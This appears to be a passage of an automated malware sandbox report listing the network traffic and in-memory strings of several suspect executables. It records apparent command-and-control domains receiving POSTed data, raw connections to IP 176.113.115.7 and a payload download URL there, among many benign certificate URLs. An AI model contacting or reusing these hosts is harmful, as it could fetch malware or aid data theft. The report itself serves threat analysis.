Source: global traffic | HTTP traffic detected: POST /LksNAz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=74KcwAAi5R92ahpIvDB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20390 | Host: fostinjec.today
Source: global traffic | HTTP traffic detected: POST /LksNAz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=BK9qLZgJz987b1uY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 2547 | Host: fostinjec.today
Source: global traffic | HTTP traffic detected: POST /LksNAz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=AB2Vm5wJ4ALfE3haht2 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 566536 | Host: fostinjec.today
Source: global traffic | HTTP traffic detected: POST /LksNAz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 79 | Host: fostinjec.today
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: agroecologyguide.digital
Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: global traffic | DNS traffic detected: DNS query: defaulemot.run
Source: global traffic | DNS traffic detected: DNS query: ZuYwLYOGpsYmohRivNRzySjfrEDfR.ZuYwLYOGpsYmohRivNRzySjfrEDfR
Source: global traffic | DNS traffic detected: DNS query: fostinjec.today
Source: global traffic | DNS traffic detected: DNS query: techspherxe.top
Source: global traffic | DNS traffic detected: DNS query: agroecologyguide.digital
Source: global traffic | DNS traffic detected: DNS query: pulseon.top
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: explorebieology.run
Source: unknown | HTTP traffic detected: POST /jUSiaz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 51 | Host: defaulemot.run
Source: 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7//
Source: 2R0700.exe, 00000005.00000003.1208651372.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7//Ky
Source: 2R0700.exe, 00000005.00000003.1208651372.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/Yy
Source: 2R0700.exe, 00000005.00000003.1208885485.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/mine/random.exe
Source: 2R0700.exe, 00000005.00000003.1208885485.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/mine/random.exei
Source: 2R0700.exe, 00000005.00000003.1208651372.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209620551.0000000000679000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7:80/mine/random.exerosoft
Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                              Source: ADFoyxP.exe, 00000015.00000000.1524783358.0000000000408000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                              Source: HmngBpR.exe, 00000010.00000002.1517748092.000000000653A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
